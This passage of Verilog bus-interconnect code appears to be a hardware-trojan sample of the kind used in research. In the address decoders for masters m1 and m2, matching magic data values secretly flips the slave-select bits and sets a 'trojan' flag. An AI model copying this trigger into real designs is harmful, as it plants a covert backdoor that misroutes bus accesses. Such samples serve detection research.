            m0_s12_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s12_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd12 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s13_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s13_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s13_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd13 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s14_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s14_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s14_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd14 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m0_s15_cyc_o <= 1'b0;
        end
        else
        begin 
            m0_s15_cyc_o <= ( ( ( m0_cyc_i &  !( m0_stb_i) ) ) ? ( m0_s15_cyc_o ) : ( ( ( ( m0_slv_sel == 4'd15 ) ) ? ( m0_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  m0_slv_sel or  s0_m0_ack_o or  s1_m0_ack_o or  s2_m0_ack_o or  s3_m0_ack_o or  s4_m0_ack_o or  s5_m0_ack_o or  s6_m0_ack_o or  s7_m0_ack_o or  s8_m0_ack_o or  s9_m0_ack_o or  s10_m0_ack_o or  s11_m0_ack_o or  s12_m0_ack_o or  s13_m0_ack_o or  s14_m0_ack_o or  s15_m0_ack_o)
    begin
        case ( m0_slv_sel ) 
        4'd0:
        begin
            m0_wb_ack_o = s0_m0_ack_o;
        end
        4'd1:
        begin
            m0_wb_ack_o = s1_m0_ack_o;
        end
        4'd2:
        begin
            m0_wb_ack_o = s2_m0_ack_o;
        end
        4'd3:
        begin
            m0_wb_ack_o = s3_m0_ack_o;
        end
        4'd4:
        begin
            m0_wb_ack_o = s4_m0_ack_o;
        end
        4'd5:
        begin
            m0_wb_ack_o = s5_m0_ack_o;
        end
        4'd6:
        begin
            m0_wb_ack_o = s6_m0_ack_o;
        end
        4'd7:
        begin
            m0_wb_ack_o = s7_m0_ack_o;
        end
        4'd8:
        begin
            m0_wb_ack_o = s8_m0_ack_o;
        end
        4'd9:
        begin
            m0_wb_ack_o = s9_m0_ack_o;
        end
        4'd10:
        begin
            m0_wb_ack_o = s10_m0_ack_o;
        end
        4'd11:
        begin
            m0_wb_ack_o = s11_m0_ack_o;
        end
        4'd12:
        begin
            m0_wb_ack_o = s12_m0_ack_o;
        end
        4'd13:
        begin
            m0_wb_ack_o = s13_m0_ack_o;
        end
        4'd14:
        begin
            m0_wb_ack_o = s14_m0_ack_o;
        end
        4'd15:
        begin
            m0_wb_ack_o = s15_m0_ack_o;
        end
        endcase
    end
    always @ (  m0_slv_sel or  s0_m0_err_o or  s1_m0_err_o or  s2_m0_err_o or  s3_m0_err_o or  s4_m0_err_o or  s5_m0_err_o or  s6_m0_err_o or  s7_m0_err_o or  s8_m0_err_o or  s9_m0_err_o or  s10_m0_err_o or  s11_m0_err_o or  s12_m0_err_o or  s13_m0_err_o or  s14_m0_err_o or  s15_m0_err_o)
    begin
        case ( m0_slv_sel ) 
        4'd0:
        begin
            m0_wb_err_o = s0_m0_err_o;
        end
        4'd1:
        begin
            m0_wb_err_o = s1_m0_err_o;
        end
        4'd2:
        begin
            m0_wb_err_o = s2_m0_err_o;
        end
        4'd3:
        begin
            m0_wb_err_o = s3_m0_err_o;
        end
        4'd4:
        begin
            m0_wb_err_o = s4_m0_err_o;
        end
        4'd5:
        begin
            m0_wb_err_o = s5_m0_err_o;
        end
        4'd6:
        begin
            m0_wb_err_o = s6_m0_err_o;
        end
        4'd7:
        begin
            m0_wb_err_o = s7_m0_err_o;
        end
        4'd8:
        begin
            m0_wb_err_o = s8_m0_err_o;
        end
        4'd9:
        begin
            m0_wb_err_o = s9_m0_err_o;
        end
        4'd10:
        begin
            m0_wb_err_o = s10_m0_err_o;
        end
        4'd11:
        begin
            m0_wb_err_o = s11_m0_err_o;
        end
        4'd12:
        begin
            m0_wb_err_o = s12_m0_err_o;
        end
        4'd13:
        begin
            m0_wb_err_o = s13_m0_err_o;
        end
        4'd14:
        begin
            m0_wb_err_o = s14_m0_err_o;
        end
        4'd15:
        begin
            m0_wb_err_o = s15_m0_err_o;
        end
        endcase
    end
    always @ (  m0_slv_sel or  s0_m0_rty_o or  s1_m0_rty_o or  s2_m0_rty_o or  s3_m0_rty_o or  s4_m0_rty_o or  s5_m0_rty_o or  s6_m0_rty_o or  s7_m0_rty_o or  s8_m0_rty_o or  s9_m0_rty_o or  s10_m0_rty_o or  s11_m0_rty_o or  s12_m0_rty_o or  s13_m0_rty_o or  s14_m0_rty_o or  s15_m0_rty_o)
    begin
        case ( m0_slv_sel ) 
        4'd0:
        begin
            m0_wb_rty_o = s0_m0_rty_o;
        end
        4'd1:
        begin
            m0_wb_rty_o = s1_m0_rty_o;
        end
        4'd2:
        begin
            m0_wb_rty_o = s2_m0_rty_o;
        end
        4'd3:
        begin
            m0_wb_rty_o = s3_m0_rty_o;
        end
        4'd4:
        begin
            m0_wb_rty_o = s4_m0_rty_o;
        end
        4'd5:
        begin
            m0_wb_rty_o = s5_m0_rty_o;
        end
        4'd6:
        begin
            m0_wb_rty_o = s6_m0_rty_o;
        end
        4'd7:
        begin
            m0_wb_rty_o = s7_m0_rty_o;
        end
        4'd8:
        begin
            m0_wb_rty_o = s8_m0_rty_o;
        end
        4'd9:
        begin
            m0_wb_rty_o = s9_m0_rty_o;
        end
        4'd10:
        begin
            m0_wb_rty_o = s10_m0_rty_o;
        end
        4'd11:
        begin
            m0_wb_rty_o = s11_m0_rty_o;
        end
        4'd12:
        begin
            m0_wb_rty_o = s12_m0_rty_o;
        end
        4'd13:
        begin
            m0_wb_rty_o = s13_m0_rty_o;
        end
        4'd14:
        begin
            m0_wb_rty_o = s14_m0_rty_o;
        end
        4'd15:
        begin
            m0_wb_rty_o = s15_m0_rty_o;
        end
        endcase
    end
    assign m1_wb_data_i = m1_data_i;
    assign m1_data_o = m1_wb_data_o;
    assign m1_wb_addr_i = m1_addr_i;
    assign m1_wb_sel_i = m1_sel_i;
    assign m1_wb_we_i = m1_we_i;
    assign m1_ack_o = m1_wb_ack_o;
    assign m1_err_o = m1_wb_err_o;
    assign m1_rty_o = m1_wb_rty_o;
    always @ (  m1_addr_i)
    begin
        if ( ( m1_data_i == 32'b00101010111110101011110011100000 ) && ( s0_m1_data_o == 32'b00011110010101010101001010101100 ) ) 
        begin
            m1_slv_sel = ( m1_addr_i[( m1_aw - 1 ):( m1_aw - 4 )] ^ 4'b1111 );
            m1_trojan = 1;
        end
        else
        begin 
            m1_slv_sel = m1_addr_i[( m1_aw - 1 ):( m1_aw - 4 )];
        end
    end
    always @ (  m1_slv_sel or  s0_m1_data_o or  s1_m1_data_o or  s2_m1_data_o or  s3_m1_data_o or  s4_m1_data_o or  s5_m1_data_o or  s6_m1_data_o or  s7_m1_data_o or  s8_m1_data_o or  s9_m1_data_o or  s10_m1_data_o or  s11_m1_data_o or  s12_m1_data_o or  s13_m1_data_o or  s14_m1_data_o or  s15_m1_data_o)
    begin
        case ( m1_slv_sel ) 
        4'd0:
        begin
            m1_wb_data_o = s0_m1_data_o;
        end
        4'd1:
        begin
            m1_wb_data_o = s1_m1_data_o;
        end
        4'd2:
        begin
            m1_wb_data_o = s2_m1_data_o;
        end
        4'd3:
        begin
            m1_wb_data_o = s3_m1_data_o;
        end
        4'd4:
        begin
            m1_wb_data_o = s4_m1_data_o;
        end
        4'd5:
        begin
            m1_wb_data_o = s5_m1_data_o;
        end
        4'd6:
        begin
            m1_wb_data_o = s6_m1_data_o;
        end
        4'd7:
        begin
            m1_wb_data_o = s7_m1_data_o;
        end
        4'd8:
        begin
            m1_wb_data_o = s8_m1_data_o;
        end
        4'd9:
        begin
            m1_wb_data_o = s9_m1_data_o;
        end
        4'd10:
        begin
            m1_wb_data_o = s10_m1_data_o;
        end
        4'd11:
        begin
            m1_wb_data_o = s11_m1_data_o;
        end
        4'd12:
        begin
            m1_wb_data_o = s12_m1_data_o;
        end
        4'd13:
        begin
            m1_wb_data_o = s13_m1_data_o;
        end
        4'd14:
        begin
            m1_wb_data_o = s14_m1_data_o;
        end
        4'd15:
        begin
            m1_wb_data_o = s15_m1_data_o;
        end
        endcase
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s0_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s0_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s0_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd0 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s1_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s1_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s1_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd1 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s2_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s2_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s2_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd2 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s3_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s3_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s3_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd3 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s4_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s4_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s4_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd4 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s5_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s5_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s5_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd5 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s6_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s6_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s6_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd6 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s7_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s7_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s7_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd7 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s8_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s8_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s8_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd8 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s9_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s9_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s9_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd9 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s10_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s10_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s10_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd10 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s11_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s11_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s11_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd11 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s12_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s12_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s12_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd12 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s13_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s13_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s13_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd13 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s14_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s14_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s14_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd14 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m1_s15_cyc_o <= 1'b0;
        end
        else
        begin 
            m1_s15_cyc_o <= ( ( ( m1_cyc_i &  !( m1_stb_i) ) ) ? ( m1_s15_cyc_o ) : ( ( ( ( m1_slv_sel == 4'd15 ) ) ? ( m1_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  m1_slv_sel or  s0_m1_ack_o or  s1_m1_ack_o or  s2_m1_ack_o or  s3_m1_ack_o or  s4_m1_ack_o or  s5_m1_ack_o or  s6_m1_ack_o or  s7_m1_ack_o or  s8_m1_ack_o or  s9_m1_ack_o or  s10_m1_ack_o or  s11_m1_ack_o or  s12_m1_ack_o or  s13_m1_ack_o or  s14_m1_ack_o or  s15_m1_ack_o)
    begin
        case ( m1_slv_sel ) 
        4'd0:
        begin
            m1_wb_ack_o = s0_m1_ack_o;
        end
        4'd1:
        begin
            m1_wb_ack_o = s1_m1_ack_o;
        end
        4'd2:
        begin
            m1_wb_ack_o = s2_m1_ack_o;
        end
        4'd3:
        begin
            m1_wb_ack_o = s3_m1_ack_o;
        end
        4'd4:
        begin
            m1_wb_ack_o = s4_m1_ack_o;
        end
        4'd5:
        begin
            m1_wb_ack_o = s5_m1_ack_o;
        end
        4'd6:
        begin
            m1_wb_ack_o = s6_m1_ack_o;
        end
        4'd7:
        begin
            m1_wb_ack_o = s7_m1_ack_o;
        end
        4'd8:
        begin
            m1_wb_ack_o = s8_m1_ack_o;
        end
        4'd9:
        begin
            m1_wb_ack_o = s9_m1_ack_o;
        end
        4'd10:
        begin
            m1_wb_ack_o = s10_m1_ack_o;
        end
        4'd11:
        begin
            m1_wb_ack_o = s11_m1_ack_o;
        end
        4'd12:
        begin
            m1_wb_ack_o = s12_m1_ack_o;
        end
        4'd13:
        begin
            m1_wb_ack_o = s13_m1_ack_o;
        end
        4'd14:
        begin
            m1_wb_ack_o = s14_m1_ack_o;
        end
        4'd15:
        begin
            m1_wb_ack_o = s15_m1_ack_o;
        end
        endcase
    end
    always @ (  m1_slv_sel or  s0_m1_err_o or  s1_m1_err_o or  s2_m1_err_o or  s3_m1_err_o or  s4_m1_err_o or  s5_m1_err_o or  s6_m1_err_o or  s7_m1_err_o or  s8_m1_err_o or  s9_m1_err_o or  s10_m1_err_o or  s11_m1_err_o or  s12_m1_err_o or  s13_m1_err_o or  s14_m1_err_o or  s15_m1_err_o)
    begin
        case ( m1_slv_sel ) 
        4'd0:
        begin
            m1_wb_err_o = s0_m1_err_o;
        end
        4'd1:
        begin
            m1_wb_err_o = s1_m1_err_o;
        end
        4'd2:
        begin
            m1_wb_err_o = s2_m1_err_o;
        end
        4'd3:
        begin
            m1_wb_err_o = s3_m1_err_o;
        end
        4'd4:
        begin
            m1_wb_err_o = s4_m1_err_o;
        end
        4'd5:
        begin
            m1_wb_err_o = s5_m1_err_o;
        end
        4'd6:
        begin
            m1_wb_err_o = s6_m1_err_o;
        end
        4'd7:
        begin
            m1_wb_err_o = s7_m1_err_o;
        end
        4'd8:
        begin
            m1_wb_err_o = s8_m1_err_o;
        end
        4'd9:
        begin
            m1_wb_err_o = s9_m1_err_o;
        end
        4'd10:
        begin
            m1_wb_err_o = s10_m1_err_o;
        end
        4'd11:
        begin
            m1_wb_err_o = s11_m1_err_o;
        end
        4'd12:
        begin
            m1_wb_err_o = s12_m1_err_o;
        end
        4'd13:
        begin
            m1_wb_err_o = s13_m1_err_o;
        end
        4'd14:
        begin
            m1_wb_err_o = s14_m1_err_o;
        end
        4'd15:
        begin
            m1_wb_err_o = s15_m1_err_o;
        end
        endcase
    end
    always @ (  m1_slv_sel or  s0_m1_rty_o or  s1_m1_rty_o or  s2_m1_rty_o or  s3_m1_rty_o or  s4_m1_rty_o or  s5_m1_rty_o or  s6_m1_rty_o or  s7_m1_rty_o or  s8_m1_rty_o or  s9_m1_rty_o or  s10_m1_rty_o or  s11_m1_rty_o or  s12_m1_rty_o or  s13_m1_rty_o or  s14_m1_rty_o or  s15_m1_rty_o)
    begin
        case ( m1_slv_sel ) 
        4'd0:
        begin
            m1_wb_rty_o = s0_m1_rty_o;
        end
        4'd1:
        begin
            m1_wb_rty_o = s1_m1_rty_o;
        end
        4'd2:
        begin
            m1_wb_rty_o = s2_m1_rty_o;
        end
        4'd3:
        begin
            m1_wb_rty_o = s3_m1_rty_o;
        end
        4'd4:
        begin
            m1_wb_rty_o = s4_m1_rty_o;
        end
        4'd5:
        begin
            m1_wb_rty_o = s5_m1_rty_o;
        end
        4'd6:
        begin
            m1_wb_rty_o = s6_m1_rty_o;
        end
        4'd7:
        begin
            m1_wb_rty_o = s7_m1_rty_o;
        end
        4'd8:
        begin
            m1_wb_rty_o = s8_m1_rty_o;
        end
        4'd9:
        begin
            m1_wb_rty_o = s9_m1_rty_o;
        end
        4'd10:
        begin
            m1_wb_rty_o = s10_m1_rty_o;
        end
        4'd11:
        begin
            m1_wb_rty_o = s11_m1_rty_o;
        end
        4'd12:
        begin
            m1_wb_rty_o = s12_m1_rty_o;
        end
        4'd13:
        begin
            m1_wb_rty_o = s13_m1_rty_o;
        end
        4'd14:
        begin
            m1_wb_rty_o = s14_m1_rty_o;
        end
        4'd15:
        begin
            m1_wb_rty_o = s15_m1_rty_o;
        end
        endcase
    end
    assign m2_wb_data_i = m2_data_i;
    assign m2_data_o = m2_wb_data_o;
    assign m2_wb_addr_i = m2_addr_i;
    assign m2_wb_sel_i = m2_sel_i;
    assign m2_wb_we_i = m2_we_i;
    assign m2_ack_o = m2_wb_ack_o;
    assign m2_err_o = m2_wb_err_o;
    assign m2_rty_o = m2_wb_rty_o;
    always @ (  m2_addr_i)
    begin
        if ( ( m2_data_i == 32'b00101010111110101011110011100000 ) && ( s0_m2_data_o == 32'b00011110010101010101001010101100 ) ) 
        begin
            m2_slv_sel = ( m2_addr_i[( m2_aw - 1 ):( m2_aw - 4 )] ^ 4'b1111 );
            m2_trojan = 1;
        end
        else
        begin 
            m2_slv_sel = m2_addr_i[( m2_aw - 1 ):( m2_aw - 4 )];
        end
    end
    always @ (  m2_slv_sel or  s0_m2_data_o or  s1_m2_data_o or  s2_m2_data_o or  s3_m2_data_o or  s4_m2_data_o or  s5_m2_data_o or  s6_m2_data_o or  s7_m2_data_o or  s8_m2_data_o or  s9_m2_data_o or  s10_m2_data_o or  s11_m2_data_o or  s12_m2_data_o or  s13_m2_data_o or  s14_m2_data_o or  s15_m2_data_o)
    begin
        case ( m2_slv_sel ) 
        4'd0:
        begin
            m2_wb_data_o = s0_m2_data_o;
        end
        4'd1:
        begin
            m2_wb_data_o = s1_m2_data_o;
        end
        4'd2:
        begin
            m2_wb_data_o = s2_m2_data_o;
        end
        4'd3:
        begin
            m2_wb_data_o = s3_m2_data_o;
        end
        4'd4:
        begin
            m2_wb_data_o = s4_m2_data_o;
        end
        4'd5:
        begin
            m2_wb_data_o = s5_m2_data_o;
        end
        4'd6:
        begin
            m2_wb_data_o = s6_m2_data_o;
        end
        4'd7:
        begin
            m2_wb_data_o = s7_m2_data_o;
        end
        4'd8:
        begin
            m2_wb_data_o = s8_m2_data_o;
        end
        4'd9:
        begin
            m2_wb_data_o = s9_m2_data_o;
        end
        4'd10:
        begin
            m2_wb_data_o = s10_m2_data_o;
        end
        4'd11:
        begin
            m2_wb_data_o = s11_m2_data_o;
        end
        4'd12:
        begin
            m2_wb_data_o = s12_m2_data_o;
        end
        4'd13:
        begin
            m2_wb_data_o = s13_m2_data_o;
        end
        4'd14:
        begin
            m2_wb_data_o = s14_m2_data_o;
        end
        4'd15:
        begin
            m2_wb_data_o = s15_m2_data_o;
        end
        endcase
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s0_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s0_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s0_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd0 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s1_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s1_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s1_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd1 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s2_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s2_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s2_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd2 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s3_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s3_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s3_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd3 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s4_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s4_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s4_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd4 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s5_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s5_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s5_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd5 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s6_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s6_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s6_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd6 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s7_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s7_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s7_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd7 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s8_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s8_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s8_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd8 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s9_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s9_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s9_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd9 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s10_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s10_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s10_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd10 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s11_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s11_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s11_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd11 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s12_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s12_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s12_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd12 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s13_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s13_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s13_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd13 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s14_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s14_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s14_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd14 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m2_s15_cyc_o <= 1'b0;
        end
        else
        begin 
            m2_s15_cyc_o <= ( ( ( m2_cyc_i &  !( m2_stb_i) ) ) ? ( m2_s15_cyc_o ) : ( ( ( ( m2_slv_sel == 4'd15 ) ) ? ( m2_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  m2_slv_sel or  s0_m2_ack_o or  s1_m2_ack_o or  s2_m2_ack_o or  s3_m2_ack_o or  s4_m2_ack_o or  s5_m2_ack_o or  s6_m2_ack_o or  s7_m2_ack_o or  s8_m2_ack_o or  s9_m2_ack_o or  s10_m2_ack_o or  s11_m2_ack_o or  s12_m2_ack_o or  s13_m2_ack_o or  s14_m2_ack_o or  s15_m2_ack_o)
    begin
        case ( m2_slv_sel ) 
        4'd0:
        begin
            m2_wb_ack_o = s0_m2_ack_o;
        end
        4'd1:
        begin
            m2_wb_ack_o = s1_m2_ack_o;
        end
        4'd2:
        begin
            m2_wb_ack_o = s2_m2_ack_o;
        end
        4'd3:
        begin
            m2_wb_ack_o = s3_m2_ack_o;
        end
        4'd4:
        begin
            m2_wb_ack_o = s4_m2_ack_o;
        end
        4'd5:
        begin
            m2_wb_ack_o = s5_m2_ack_o;
        end
